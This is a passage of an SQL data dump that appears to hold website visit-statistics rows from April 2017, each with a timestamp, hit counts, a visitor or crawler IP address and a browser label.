088,1491382644,1,1,0,0,'163.172.52.168','chrome'),(98089,1491382733,1,1,0,0,'8.29.198.27','other'),(98090,1491382769,1,1,0,0,'163.172.71.21','other'),(98091,1491382878,1,1,0,0,'95.132.62.120','firefox'),(98092,1491382958,1,1,0,0,'163.172.108.151','chrome'),(98093,1491383002,1,1,0,0,'51.255.65.68','other'),(98094,1491383588,1,1,0,0,'163.172.64.199','other'),(98095,1491383606,1,1,0,0,'94.153.192.46','firefox'),(98096,1491384171,1,1,0,0,'164.132.161.39','other'),(98098,1491384196,1,1,0,0,'37.54.87.16','firefox'),(98099,1491384264,1,1,0,0,'51.255.65.31','other'),(98100,1491384429,1,0,1,0,'66.249.66.177',''),(98101,1491384720,1,1,0,0,'94.153.192.46','firefox'),(98102,1491385240,1,1,0,0,'51.255.65.80','other'),(98103,1491385355,1,0,1,0,'66.249.76.107',''),(98104,1491385394,1,1,0,0,'51.255.65.29','other'),(98105,1491386154,1,1,0,0,'164.132.161.77','other'),(98106,1491386162,1,1,0,0,'94.153.192.46','firefox'),(98107,1491387160,1,1,0,0,'94.153.192.46','firefox'),(98108,1491387506,1,1,0,0,'95.135.48.171','chrome'),(98109,1491387508,1,1,0,0,'163.172.64.234','other'),(98110,1491387823,1,1,0,0,'164.132.161.47','other'),(98111,1491388124,1,1,0,0,'51.255.65.40','other'),(98112,1491388394,1,1,0,0,'164.132.161.31','other'),(98113,1491388748,1,1,0,0,'91.196.178.35','chrome'),(98114,1491389163,1,1,0,0,'46.219.247.76','chrome'),(98115,1491389424,1,1,0,0,'130.180.220.134','firefox'),(98116,1491390853,1,1,0,0,'94.153.192.46','firefox'),(98117,1491390963,1,1,0,0,'46.219.247.76','chrome'),(98118,1491391106,1,1,0,0,'91.196.178.66','firefox'),(98119,1491391140,1,0,1,0,'66.249.76.108',''),(98120,1491391572,1,0,1,0,'66.249.76.93',''),(98121,1491391797,1,1,0,0,'163.172.69.178','other'),(98122,1491391837,1,1,0,0,'91.196.178.65','firefox'),(98123,1491392006,1,0,1,0,'66.249.76.89',''),(98124,1491392110,1,1,0,0,'51.255.65.10','other'),(98125,1491392196,1,1,0,0,'51.255.65.43','other'),(98126,1491392568,1,0,1,0,'66.249.66.180',''),(98127,1491392616,1,1,0,0,'94.153.192.46','firefox'),(98128,1491393046,1,1,0,0,'212.58.160.35','other'),(98129,1491393137,1,1,0,0,'91.196.178.71','firefox'),(98130,1491393256,1,1,0,0,'195.206.232.121','chrome'),(98131,1491393278,1,0,1,0,'66.249.76.91',''),(98132,1491393574,1,1,0,0,'8.29.198.25','other'),(98133,1491394170,1,1,0,0,'91.196.178.69','firefox'),(98134,1491394359,1,1,0,0,'128.69.154.179','opera'),(98135,1491394401,1,0,1,0,'66.249.76.91',''),(98136,1491394512,1,0,1,0,'66.249.76.108',''),(98137,1491394681,1,1,0,0,'91.196.178.66','firefox'),(98138,1491395014,1,1,0,0,'91.196.178.68','firefox'),(98139,1491395099,1,1,0,0,'194.110.126.23','chrome'),(98140,1491395902,1,1,0,0,'51.255.65.62','other'),(98141,1491396853,1,1,0,0,'91.196.178.66','firefox'),(98142,1491397127,1,1,0,0,'51.255.65.96','other'),(98143,1491397783,1,1,0,0,'51.255.65.60','other'),(98144,1491398068,1,0,1,0,'66.249.76.109',''),(98145,1491398863,1,0,1,0,'40.77.167.100',''),(98146,1491398881,1,1,0,0,'194.44.39.152','firefox'),(98147,1491399141,1,1,0,0,'91.196.178.66','firefox'),(98148,1491399511,1,1,0,0,'51.255.65.80','other'),(98149,1491400974,1,1,0,0,'163.172.64.243','other'),(98150,1491401396,1,1,0,0,'207.46.13.170','other'),(98151,1491401925,1,1,0,0,'31.128.251.96','chrome'),(98152,1491402403,1,1,0,0,'91.196.178.161','chrome'),(98153,1491402500,1,1,0,0,'164.132.161.38','other'),(98154,1491402506,1,1,0,0,'62.216.63.92','chrome'),(98155,1491402634,1,1,0,0,'164.132.161.29','other'),(98156,1491403220,1,1,0,0,'51.255.65.86','other'),(98157,1491403236,1,0,1,0,'66.249.66.180',''),(98158,1491403772,1,1,0,0,'63.243.252.138','other'),(98159,1491404400,1,1,0,0,'8.29.198.25','other'),(98160,1491404807,1,1,0,0,'91.196.177.15','chrome'),(98161,1491405027,1,1,0,0,'164.132.161.23','other'),(98162,1491405028,1,1,0,0,'91.196.178.65','chrome'),(98163,1491405723,1,1,0,0,'164.132.161.84','other'),(98164,1491406428,1,1,0,0,'51.255.65.66','other'),(98165,1491407012,1,1,0,0,'66.249.93.91','chrome'),(98166,1491408982,1,0,1,0,'66.249.76.107',''),(98167,1491408983,1,1,0,0,'164.132.161.60','other'),(98168,1491409227,1,1,0,0,'164.132.161.59','other'),(98169,1491409682,1,0,1,0,'66.249.76.93',''),(98170,1491410303,1,0,1,0,'66.249.66.87',''),(98171,1491410818,1,1,0,0,'78.154.179.131','chrome'),(98172,1491410831,1,1,0,0,'51.255.65.61','other'),(98173,1491412099,1,1,0,0,'164.132.161.60','other'),(98174,1491412884,1,1,0,0,'157.55.39.140','other'),(98175,1491413046,1,1,0,0,'141.8.142.15','other'),(98176,1491413665,1,0,1,0,'66.249.66.87',''),(98177,1491413733,2,0,2,0,'66.249.76.93',''),(98178,1491413836,1,1,0,0,'163.172.52.168','chrome'),(98179,1491413837,1,1,0,0,'163.172.108.151','chrome'),(98180,1491414362,14,0,14,0,'68.180.229.99',''),(98181,1491414389,1,1,0,0,'46.73.200.91','opera'),(98182,1491414390,1,1,0,0,'188.255.23.139','chrome'),(98183,1491414392,1,1,0,0,'95.28.203.1','chrome'),(98184,1491414985,1,0,1,0,'66.249.76.109',''),(98185,1491415240,1,1,0,0,'8.29.198.26','other'),(98186,1491415593,1,1,0,0,'164.132.161.80','other'),(98187,1491416058,1,1,0,0,'51.255.65.54','other'),(98188,1491416185,1,0,1,0,'66.249.66.177',''),(98189,1491416208,2,0,2,0,'66.249.66.180',''),(98190,1491417098,2,2,0,0,'91.196.178.162','chrome'),(98191,1491417283,1,0,1,0,'68.180.229.99',''),(98192,1491417329,1,0,1,0,'66.249.66.84',''),(98193,1491419205,1,0,1,0,'68.180.229.99',''),(98194,1491420248,1,1,0,0,'164.132.161.90','other'),(98195,1491420564,1,1,0,0,'164.132.161.75','other'),(98196,1491420796,1,1,0,0,'95.108.213.34','other'),(98197,1491421349,1,1,0,0,'141.8.142.42','other'),(98198,1491421401,1,1,0,0,'178.154.200.45','other'),(98199,1491421478,2,2,0,0,'141.8.142.38','other'),(98200,1491421543,1,1,0,0,'37.9.113.46','other'),(98201,1491421601,2,0,2,0,'66.249.76.30',''),(98202,1491421617,1,1,0,0,'141.8.132.72','other'),(98203,1491421674,1,0,1,0,'66.249.76.108',''),(98204,1491421702,2,2,0,0,'95.108.179.15','other'),(98205,1491421703,1,0,1,0,'66.249.76.109',''),(98206,1491421741,1,1,0,0,'141.8.142.97','other'),(98207,1491421776,1,1,0,0,'5.255.253.63','other'),(98208,1491421813,1,1,0,0,'5.255.253.28','other'),(98209,1491421880,1,1,0,0,'141.8.183.1','other'),(98210,1491421903,1,1,0,0,'141.8.142.164','other'),(98211,1491421939,1,1,0,0,'141.8.132.39','other'),(98212,1491421988,1,1,0,0,'95.108.213.8','other'),(98213,1491422005,1,1,0,0,'178.154.189.14','other'),(98214,1491422075,1,1,0,0,'141.8.142.9','other'),(98215,1491422784,1,1,0,0,'163.172.52.168','chrome'),(98216,1491423270,2,2,0,0,'95.108.213.34','other'),(98217,1491423421,1,1,0,0,'207.46.13.173','other'),(98218,1491423655,1,1,0,0,'51.255.65.64','other'),(98219,1491423821,1,1,0,0,'163.172.108.151','chrome'),(98220,1491423867,1,1,0,0,'163.172.64.189','other'),(98221,1491424778,3,3,0,0,'178.76.219.150','firefox'),(98222,1491424815,1,0,1,0,'207.46.13.173',''),(98223,1491424909,1,1,0,0,'164.132.161.34','other'),(98224,1491426070,1,1,0,0,'8.29.198.26','other'),(98225,1491426499,1,1,0,0,'164.132.161.90','other'),(98226,1491426883,1,0,1,0,'66.249.66.84',''),(98227,1491427057,2,2,0,0,'5.255.253.58','other'),(98228,1491427112,1,1,0,0,'178.154.200.41','other'),(98229,1491427157,1,1,0,0,'141.8.142.97','other'),(98230,1491427390,1,1,0,0,'95.108.213.34','other'),(98231,1491427429,1,1,0,0,'141.8.142.154','other'),(98232,1491427452,1,1,0,0,'141.8.142.38','other'),(98233,1491427457,1,1,0,0,'141.8.142.15','other'),(98234,1491427532,1,1,0,0,'141.8.142.164','other'),(98235,1491427980,66,66,0,0,'64.140.169.42','firefox'),(98236,1491428078,1,0,1,0,'40.77.167.80',''),(98237,1491428570,1,0,1,0,'66.249.76.108',''),(98238,1491428917,1,1,0,0,'180.76.15.25','other'),(98239,1491429130,1,0,1,0,'68.180.229.99',''),(98240,1491429409,1,1,0,0,'164.132.161.46','other'),(98241,1491429865,1,1,0,0,'164.132.161.54','other'),(98242,1491430008,1,1,0,0,'180.76.15.18','other'),(98243,1491430120,1,1,0,0,'164.132.161.23','other'),(98244,1491430229,1,1,0,0,'51.255.65.51','other'),(98245,1491430715,1,1,0,0,'95.108.179.15','other'),(98246,1491431135,1,1,0,0,'141.8.142.154','other'),(98247,1491431637,1,0,1,0,'40.77.167.0',''),(98248,1491431947,1,0,1,0,'66.249.76.107',''),(98249,1491432613,1,0,1,0,'66.249.76.30',''),(98250,1491435597,1,0,1,0,'66.249.66.180',''),(98251,1491436898,1,1,0,0,'8.29.198.27','other'),(98252,1491437474,4,4,0,0,'95.108.213.34','other'),(98253,1491437491,1,1,0,0,'141.8.142.164','other'),(98254,1491437507,1,1,0,0,'141.8.142.38','other'),(98255,1491437550,5,5,0,0,'141.8.142.154','other'),(98256,1491437610,4,4,0,0,'141.8.142.15','other'),(98257,1491437646,2,2,0,0,'5.255.253.63','other'),(98258,1491437695,5,5,0,0,'5.255.253.58','other'),(98259,1491437864,3,3,0,0,'95.108.179.15','other'),(98260,1491437921,1,0,1,0,'66.249.76.30',''),(98261,1491437953,1,1,0,0,'141.8.142.42','other'),(98262,1491438146,1,1,0,0,'178.154.200.2','other'),(98263,1491438262,2,2,0,0,'5.255.253.81','other'),(98264,1491438298,1,1,0,0,'66.249.76.108','chrome'),(98265,1491438396,1,1,0,0,'216.244.66.237','other'),(98266,1491438501,3,3,0,0,'141.8.142.154','other'),(98267,1491438582,4,4,0,0,'141.8.142.164','other'),(98268,1491438621,3,3,0,0,'95.108.213.7','other'),(98269,1491438748,4,4,0,0,'141.8.142.15','other'),(98270,1491438772,5,5,0,0,'141.8.142.38','other'),(98271,1491438898,4,4,0,0,'95.108.179.15','other'),(98272,1491438994,8,8,0,0,'5.255.253.63','other'),(98273,1491439049,6,6,0,0,'178.154.200.37','other'),(98274,1491439259,5,5,0,0,'95.108.213.8','other'),(98275,1491439276,3,3,0,0,'141.8.183.1','other'),(98276,1491439291,5,5,0,0,'5.255.253.83','other'),(98277,1491439330,8,8,0,0,'93.158.152.77','other'),(98278,1491439335,8,8,0,0,'141.8.142.42','other'),(98279,1491439415,5,5,0,0,'5.255.253.81','other'),(98280,1491439419,7,7,0,0,'95.108.213.34','other'),(98281,1491439423,4,4,0,0,'178.154.149.3','other'),(98282,1491439431,7,7,0,0,'178.154.200.45','other'),(98283,1491439436,4,4,0,0,'141.8.132.39','other'),(98284,1491439529,5,5,0,0,'141.8.142.164','other'),(98285,1491439533,5,5,0,0,'93.158.152.79','other'),(98286,1491439586,1,1,0,0,'5.255.253.28','other'),(98287,1491439590,10,10,0,0,'178.154.189.3','other'),(98288,1491439604,4,4,0,0,'37.9.113.38','other'),(98289,1491439606,5,5,0,0,'5.255.253.58','other'),(98290,1491439614,5,5,0,0,'178.154.200.2','other'),(98291,1491439623,3,3,0,0,'141.8.132.25','other'),(98292,1491439625,4,4,0,0,'37.9.113.43','other'),(98293,1491439640,4,4,0,0,'141.8.132.72','other'),(98294,1491439643,7,7,0,0,'141.8.142.154','other'),(98295,1491439647,5,5,0,0,'95.108.213.7','other'),(98296,1491439668,4,4,0,0,'141.8.142.97','other'),(98297,1491439670,3,3,0,0,'5.255.253.43','other'),(98298,1491439684,7,7,0,0,'141.8.142.38','other'),(98299,1491439717,5,5,0,0,'141.8.142.15','other'),(98300,1491439774,3,3,0,0,'178.154.149.1','other'),(98301,1491439976,3,3,0,0,'178.154.200.37','other'),(98302,1491440154,3,3,0,0,'95.108.179.15','other'),(98303,1491440188,7,7,0,0,'5.255.253.63','other'),(98304,1491440275,1,1,0,0,'93.158.152.59','other'),(98305,1491440323,1,1,0,0,'141.8.142.42','other'),(98306,1491440327,1,1,0,0,'178.154.149.3','other'),(98307,1491440585,3,3,0,0,'95.108.213.7','other'),(98308,1491440687,3,3,0,0,'141.8.142.38','other'),(98309,1491440706,5,5,0,0,'141.8.142.15','other'),(98310,1491440719,2,2,0,0,'141.8.142.164','other'),(98311,1491440731,2,2,0,0,'216.244.66.237','other'),(98312,1491440795,3,3,0,0,'141.8.142.154','other'),(98313,1491441049,1,1,0,0,'141.8.142.97','other'),(98314,1491441051,2,2,0,0,'37.9.113.43','other'),(98315,1491441066,4,4,0,0,'5.255.253.81','other'),(98316,1491441077,2,2,0,0,'178.154.200.45','other'),(98317,1491441087,2,2,0,0,'178.154.200.37','other'),(98318,1491441089,1,1,0,0,'141.8.132.72','other'),(98319,1491441118,2,2,0,0,'95.108.213.34','other'),(98320,1491441198,4,4,0,0,'5.255.253.63','other'),(98321,1491441327,1,1,0,0,'5.255.253.43','other'),(98322,1491441368,1,1,0,0,'178.154.189.3','other'),(98323,1491441393,1,1,0,0,'178.154.149.3','other'),(98324,1491441395,1,1,0,0,'178.154.189.22','other'),(98325,1491441538,2,2,0,0,'93.158.152.77','other'),(98326,1491441565,1,1,0,0,'141.8.132.25','other'),(98327,1491441602,1,1,0,0,'95.108.213.8','other'),(98328,1491441621,2,2,0,0,'141.8.142.38','other'),(98329,1491441665,3,3,0,0,'178.154.149.1','other'),(98330,1491441688,1,1,0,0,'95.108.213.7','other'),(98331,1491441858,2,2,0,0,'95.108.179.15','other'),(98332,1491441914,4,4,0,0,'141.8.142.154','other'),(98333,1491442042,4,4,0,0,'95.108.213.34','other'),(98334,1491442079,4,4,0,0,'141.8.142.164','other'),(98335,1491442217,3,3,0,0,'141.8.142.15','other'),(98336,1491442393,3,3,0,0,'5.255.253.63','other'),(98337,1491442885,2,2,0,0,'95.108.213.7','other'),(98338,1491443899,1,0,1,0,'68.180.229.99',''),(98339,1491443940,1,1,0,0,'5.255.253.83','other'),(98340,1491444021,1,1,0,0,'178.154.200.2','other'),(98341,1491444336,1,1,0,0,'216.244.66.237','other'),(98342,1491444620,1,0,1,0,'66.249.76.29',''),(98343,1491444690,1,1,0,0,'95.108.179.15','other'),(98344,1491445064,1,0,1,0,'40.77.167.80',''),(98345,1491447732,1,1,0,0,'8.29.198.25','other'),(98346,1491450979,1,0,1,0,'207.46.13.169',''),(98347,1491451476,1,0,1,0,'66.249.66.84',''),(98348,1491451967,1,1,0,0,'180.76.15.151','other'),(98349,1491452222,1,1,0,0,'164.132.161.70','other'),(98350,1491452454,1,1,0,0,'163.172.64.244','other'),(98351,1491452571,1,1,0,0,'91.196.178.40','chrome'),(98352,1491452804,1,1,0,0,'163.172.64.183','other'),(98353,1491453253,1,1,0,0,'51.255.65.55','other'),(98354,1491453565,1,1,0,0,'216.244.66.237','other'),(98355,1491454389,1,1,0,0,'163.172.71.29','other'),(98356,1491456179,1,1,0,0,'95.108.179.15','other'),(98357,1491456862,1,1,0,0,'164.132.161.27','other'),(98358,1491457069,2,2,0,0,'91.196.178.166','chrome'),(98359,1491457197,1,0,1,0,'66.249.76.107',''),(98360,1491457593,1,1,0,0,'207.46.13.169','other'),(98361,1491457727,1,1,0,0,'40.77.167.0','other'),(98362,1491457799,1,1,0,0,'66.102.9.27','chrome'),(98363,1491458117,1,1,0,0,'51.255.65.6','other'),(98364,1491458131,1,1,0,0,'91.196.177.46','chrome'),(98365,1491458497,1,1,0,0,'91.196.178.68','chrome'),(98366,1491458567,1,1,0,0,'8.29.198.27','other'),(98367,1491459065,2,2,0,0,'141.8.142.15','other'),(98368,1491459160,3,3,0,0,'95.108.179.15','other'),(98369,1491459303,4,4,0,0,'95.108.213.34','other'),(98370,1491459456,3,3,0,0,'95.108.213.7','other'),(98371,1491459550,2,2,0,0,'141.8.142.164','other'),(98372,1491459587,1,1,0,0,'130.180.217.113','firefox'),(98373,1491459714,1,1,0,0,'5.255.253.63','other'),(98374,1491459814,1,1,0,0,'141.8.142.38','other'),(98375,1491459821,1,1,0,0,'37.9.113.38','other'),(98376,1491459829,2,2,0,0,'178.154.200.37','other'),(98377,1491459839,1,1,0,0,'95.108.213.8','other'),(98378,1491459852,1,1,0,0,'93.158.152.79','other'),(98379,1491460115,1,1,0,0,'178.92.208.97','chrome'),(98380,1491460398,1,1,0,0,'163.172.64.246','other'),(98381,1491460521,1,1,0,0,'164.132.161.96','other'),(98382,1491461143,1,1,0,0,'91.196.178.66','firefox'),(98383,1491461619,1,1,0,0,'163.172.64.179','other'),(98384,1491461760,1,1,0,0,'163.172.69.178','other'),(98385,1491462328,1,1,0,0,'51.255.65.53','other'),(98386,1491462440,1,1,0,0,'91.196.178.66','firefox'),(98387,1491462683,1,1,0,0,'91.196.178.38','firefox'),(98388,1491463966,1,1,0,0,'51.255.65.19','other'),(98389,1491464018,1,1,0,0,'46.219.247.76','chrome'),(98390,1491464684,1,1,0,0,'51.255.65.62','other'),(98391,1491464803,1,1,0,0,'194.44.6.22','firefox'),(98392,1491464970,1,0,1,0,'66.249.76.28',''),(98393,1491465411,1,1,0,0,'91.196.178.65','chrome'),(98394,1491465639,1,1,0,0,'164.132.161.60','other'),(98395,1491465744,1,1,0,0,'91.196.178.166','chrome'),(98396,1491466069,1,1,0,0,'164.132.161.44','other'),(98397,1491466344,1,1,0,0,'212.111.196.39','chrome'),(98398,1491466611,1,1,0,0,'164.132.161.8','other'),(98399,1491466877,1,1,0,0,'51.255.65.77','other'),(98400,1491467059,1,1,0,0,'164.132.161.93','other'),(98401,1491467064,1,1,0,0,'40.77.167.0','other'),(98402,1491467166,1,0,1,0,'68.180.229.99',''),(98403,1491467178,2,2,0,0,'216.244.66.237','other'),(98404,1491467194,1,1,0,0,'66.249.76.28','chrome'),(98405,1491467204,1,1,0,0,'66.249.76.109','chrome'),(98406,1491467403,1,1,0,0,'194.44.6.22','firefox'),(98407,1491467676,1,1,0,0,'91.196.178.38','firefox'),(98408,1491468311,1,1,0,0,'51.255.65.55','other'),(98409,1491468340,2,2,0,0,'95.132.25.162','chrome'),(98410,1491468972,1,1,0,0,'164.132.161.70','other'),(98411,1491469115,1,0,1,0,'40.77.167.0',''),(98412,1491469173,1,1,0,0,'37.54.146.165','chrome'),(98413,1491469414,1,1,0,0,'8.29.198.27','other'),(98414,1491470351,1,1,0,0,'164.132.161.65','other'),(98415,1491471128,1,1,0,0,'164.132.161.34','other'),(98416,1491471171,1,1,0,0,'164.132.161.14','other'),(98417,1491471202,1,1,0,0,'91.196.178.166','chrome'),(98418,1491471348,1,1,0,0,'164.132.161.97','other'),(98419,1491473082,1,1,0,0,'82.207.91.234','firefox'),(98420,1491473388,1,1,0,0,'157.55.39.191','other'),(98421,1491473497,1,0,1,0,'66.249.66.81',''),(98422,1491474056,1,1,0,0,'51.255.65.36','other'),(98423,1491474470,1,0,1,0,'66.249.76.28',''),(98424,1491474692,1,1,0,0,'66.249.76.30','chrome'),(98425,1491474863,1,0,1,0,'66.249.66.81',''),(98426,1491477160,1,1,0,0,'82.207.49.50','chrome'),(98427,1491477550,1,1,0,0,'216.244.66.237','other'),(98428,1491477573,1,0,1,0,'66.249.76.28',''),(98429,1491477879,1,1,0,0,'193.93.48.24','other'),(98430,1491478065,1,0,1,0,'66.249.66.84',''),(98431,1491478697,1,0,1,0,'66.249.66.180',''),(98432,1491479964,1,1,0,0,'91.196.178.166','chrome'),(98433,1491480175,1,1,0,0,'216.244.66.237','other'),(98434,1491480245,1,1,0,0,'8.29.198.27','other'),(98435,1491480681,1,0,1,0,'207.46.13.169',''),(98436,1491481177,1,1,0,0,'82.207.91.234','firefox'),(98437,1491481606,1,1,0,0,'91.196.178.166','chrome'),(98438,1491482868,1,1,0,0,'216.244.66.237','other'),(98439,1491483528,1,1,0,0,'37.54.166.1','chrome'),(98440,1491483944,1,1,0,0,'193.34.173.227','firefox'),(98441,1491484411,1,0,1,0,'66.249.66.84',''),(98442,1491484614,1,1,0,0,'91.196.177.46','firefox'),(98443,1491484883,1,0,1,0,'66.249.76.30',''),(98444,1491485275,1,1,0,0,'216.244.66.237','other'),(98445,1491485453,1,1,0,0,'91.196.178.66','firefox'),(98446,1491485528,1,1,0,0,'91.196.178.68','firefox'),(98447,1491485686,1,1,0,0,'91.196.177.15','chrome'),(98448,1491486984,1,1,0,0,'180.76.15.137','other'),(98449,1491487970,1,1,0,0,'37.73.245.51','chrome'),(98450,1491488209,1,0,1,0,'66.249.76.30',''),(98451,1491489407,1,1,0,0,'207.46.13.115','other'),(98452,1491489682,1,0,1,0,'66.249.76.109',''),(98453,1491489991,1,0,1,0,'66.249.76.29',''),(98454,1491490930,1,0,1,0,'66.249.76.108',''),(98455,1491491077,1,1,0,0,'8.29.198.25','other'),(98456,1491491221,1,0,1,0,'66.249.76.30',''),(98457,1491491298,1,0,1,0,'66.249.66.87',''),(98458,1491491590,1,0,1,0,'66.249.76.29',''),(98459,1491492109,1,0,1,0,'40.77.167.50',''),(98460,1491492871,1,0,1,0,'66.249.76.108',''),(98461,1491493188,1,0,1,0,'66.249.66.177',''),(98462,1491494362,1,1,0,0,'91.196.178.38','firefox'),(98463,1491494613,1,1,0,0,'94.179.209.204','firefox'),(98464,1491495580,1,1,0,0,'66.249.66.177','chrome'),(98465,1491496099,1,1,0,0,'37.55.57.116','chrome'),(98466,1491496563,1,0,1,0,'66.249.66.177',''),(98467,1491496724,1,0,1,0,'66.249.76.30',''),(98468,1491498145,1,1,0,0,'91.196.178.66','firefox'),(98469,1491498727,1,0,1,0,'66.249.66.180',''),(98470,1491498788,1,1,0,0,'66.249.66.84','chrome'),(98471,1491499621,1,1,0,0,'66.249.76.108','chrome'),(98472,1491499907,1,0,1,0,'207.46.13.242',''),(98473,1491500258,1,1,0,0,'66.102.9.38','chrome'),(98474,1491500539,1,1,0,0,'91.196.178.163','chrome'),(98475,1491500874,1,0,1,0,'66.249.66.81',''),(98476,1491501332,1,0,1,0,'66.249.76.30',''),(98477,1491501906,1,1,0,0,'8.29.198.27','other'),(98478,1491502059,1,1,0,0,'164.132.161.92','other'),(98479,1491502531,1,1,0,0,'51.255.65.81','other'),(98480,1491502881,1,0,1,0,'68.180.229.99',''),(98481,1491503142,1,1,0,0,'51.255.65.61','other'),(98482,1491503190,1,1,0,0,'51.255.65.89','other'),(98483,1491503504,1,0,1,0,'157.55.39.69',''),(98484,1491503666,1,1,0,0,'164.132.161.39','other'),(98485,1491504281,1,0,1,0,'66.249.76.108',''),(98486,1491504607,1,0,1,0,'66.249.76.28',''),(98487,1491504884,1,0,1,0,'66.249.66.87',''),(98488,1491505156,1,1,0,0,'46.211.69.39','chrome'),(98489,1491506669,1,1,0,0,'163.172.64.222','other'),(98490,1491506711,1,1,0,0,'51.255.65.82','other'),(98491,1491507237,1,0,1,0,'66.249.76.108',''),(98492,1491507606,1,1,0,0,'40.77.167.50','other'),(98493,1491508019,1,1,0,0,'51.255.65.86','other'),(98494,1491508112,1,1,0,0,'51.255.65.74','other'),(98495,1491508484,1,1,0,0,'51.255.65.81','other'),(98496,1491508786,1,1,0,0,'130.180.219.245','other'),(98497,1491508814,1,1,0,0,'163.172.64.239','other'),(98498,1491509546,1,0,1,0,'66.249.76.108',''),(98499,1491509824,1,1,0,0,'51.255.65.22','other'),(98500,1491509945,1,1,0,0,'164.132.161.95','other'),(98501,1491510929,1,0,1,0,'66.249.76.109',''),(98502,1491512737,1,1,0,0,'8.29.198.27','other'),(98503,1491512976,1,0,1,0,'40.77.167.50',''),(98504,1491513102,1,1,0,0,'164.132.161.21','other'),(98505,1491513483,1,1,0,0,'51.255.65.20','other'),(98506,1491513592,1,1,0,0,'141.8.142.15','other'),(98507,1491513596,1,1,0,0,'5.255.253.63','other'),(98508,1491513760,1,1,0,0,'93.170.187.48','chrome'),(98509,1491514150,1,1,0,0,'163.172.64.243','other'),(98510,1491515627,1,1,0,0,'216.244.66.237','other'),(98511,1491516275,1,1,0,0,'51.255.65.78','other'),(98512,1491516311,1,0,1,0,'66.249.76.107',''),(98513,1491516482,1,1,0,0,'163.172.64.245','other'),(98514,1491517161,1,1,0,0,'51.255.65.23','other'),(98515,1491517280,1,0,1,0,'66.249.76.30',''),(98516,1491517395,1,0,1,0,'66.249.76.108',''),(98517,1491517922,1,1,0,0,'63.243.252.165','other'),(98518,1491518408,1,1,0,0,'51.255.65.43','other'),(98519,1491518910,1,0,1,0,'66.249.66.87',''),(98520,1491519388,1,1,0,0,'164.132.161.19','other'),(98521,1491520192,1,1,0,0,'164.132.161.66','other'),(98522,1491520604,1,0,1,0,'40.77.167.116',''),(98523,1491520764,1,1,0,0,'163.172.64.235','other'),(98524,1491520791,1,1,0,0,'51.255.65.36','other'),(98525,1491522019,1,0,1,0,'66.249.76.108',''),(98526,1491523253,1,1,0,0,'216.244.66.237','other'),(98527,1491523569,1,1,0,0,'8.29.198.27','other'),(98528,1491523657,1,1,0,0,'157.55.39.76','other'),(98529,1491524033,1,0,1,0,'40.77.167.109',''),(98530,1491524340,1,0,1,0,'66.249.76.109',''),(98531,1491525096,1,0,1,0,'66.249.76.29',''),(98532,1491525647,1,0,1,0,'66.249.66.84',''),(98533,1491525758,1,1,0,0,'66.249.66.183','chrome'),(98534,1491525787,2,1,1,0,'66.249.76.108',''),(98535,1491525798,1,1,0,0,'164.132.161.54','other'),(98536,1491525952,1,1,0,0,'51.255.65.42','other'),(98537,1491526104,1,1,0,0,'51.255.65.73','other'),(98538,1491526935,1,0,1,0,'40.77.167.21',''),(98539,1491528185,1,0,1,0,'40.77.167.24',''),(98540,1491528488,1,1,0,0,'207.46.13.83','other'),(98541,1491530540,1,1,0,0,'37.9.113.43','other'),(98542,1491530556,4,4,0,0,'95.108.213.7','other'),(98543,1491530668,2,2,0,0,'95.108.179.15','other'),(98544,1491530777,2,2,0,0,'178.154.200.2','other'),(98545,1491530825,1,1,0,0,'95.108.213.34','other'),(98546,1491530828,1,1,0,0,'51.255.65.70','other'),(98547,1491530881,1,1,0,0,'178.154.189.16','other'),(98548,1491530960,1,1,0,0,'178.154.200.64','other'),(98549,1491531008,1,1,0,0,'95.108.213.8','other'),(98550,1491531038,1,1,0,0,'141.8.142.154','other'),(98551,1491531064,2,2,0,0,'141.8.142.164','other'),(98552,1491531117,1,1,0,0,'141.8.132.25','other'),(98553,1491531307,1,1,0,0,'5.255.253.63','other'),(98554,1491531487,1,1,0,0,'178.154.149.3','other'),(98555,1491531510,1,1,0,0,'178.154.189.3','other'),(98556,1491531513,1,1,0,0,'93.158.152.77','other'),(98557,1491531548,1,1,0,0,'141.8.183.1','other'),(98558,1491532024,1,1,0,0,'5.255.253.83','other'),(98559,1491532274,1,1,0,0,'141.8.142.164','other'),(98560,1491532533,1,1,0,0,'5.255.253.63','other'),(98561,1491533679,1,1,0,0,'163.172.64.217','other'),(98562,1491533811,1,1,0,0,'164.132.161.95','other'),(98563,1491534020,1,1,0,0,'216.244.66.237','other'),(98564,1491534403,1,1,0,0,'8.29.198.26','other'),(98565,1491534588,1,1,0,0,'51.255.65.55','other'),(98566,1491534824,1,1,0,0,'51.255.65.66','other'),(98567,1491535242,1,1,0,0,'95.108.213.34','other'),(98568,1491535332,1,1,0,0,'141.8.142.15','other'),(98569,1491535449,2,2,0,0,'95.108.213.7','other'),(98570,1491535626,1,0,1,0,'157.55.39.76',''),(98571,1491535659,2,2,0,0,'95.108.179.15','other'),(98572,1491535769,1,1,0,0,'5.140.235.2','chrome'),(98573,1491536200,1,0,1,0,'66.249.66.81',''),(98574,1491536529,1,0,1,0,'66.249.66.87',''),(98575,1491536966,1,1,0,0,'51.255.65.30','other'),(98576,1491538813,1,1,0,0,'208.43.225.85','other'),(98577,1491538864,1,0,1,0,'66.249.66.177',''),(98578,1491539023,1,1,0,0,'163.172.64.181','other'),(98579,1491539256,1,0,1,0,'66.249.76.28',''),(98580,1491539663,1,1,0,0,'91.196.178.69','firefox'),(98581,1491540321,1,0,1,0,'157.55.39.76',''),(98582,1491540422,2,2,0,0,'141.8.142.164','other'),(98583,1491540670,1,1,0,0,'5.255.253.43','other'),(98584,1491540795,1,0,1,0,'66.249.66.177',''),(98585,1491540831,1,1,0,0,'37.9.113.38','other'),(98586,1491541084,2,2,0,0,'95.108.213.34','other'),(98587,1491541216,1,1,0,0,'178.154.200.37','other'),(98588,1491541235,1,1,0,0,'216.244.66.237','other'),(98589,1491541403,1,1,0,0,'51.255.65.26','other'),(98590,1491541419,1,1,0,0,'95.108.213.7','other'),(98591,1491541574,1,1,0,0,'163.172.64.182','other'),(98592,1491541589,2,2,0,0,'5.255.253.63','other'),(98593,1491541697,1,1,0,0,'141.8.142.154','other'),(98594,1491541735,1,1,0,0,'5.255.253.81','other'),(98595,1491541755,1,1,0,0,'141.8.132.25','other'),(98596,1491541892,2,2,0,0,'95.108.179.15','other'),(98597,1491541893,1,1,0,0,'5.255.253.31','other'),(98598,1491541975,1,1,0,0,'5.255.253.83','other'),(98599,1491542121,1,1,0,0,'95.108.179.21','other'),(98600,1491542179,1,1,0,0,'141.8.142.164','other'),(98601,1491542299,1,1,0,0,'93.158.152.77','other'),(98602,1491542388,1,1,0,0,'51.255.65.30','other'),(98603,1491542412,2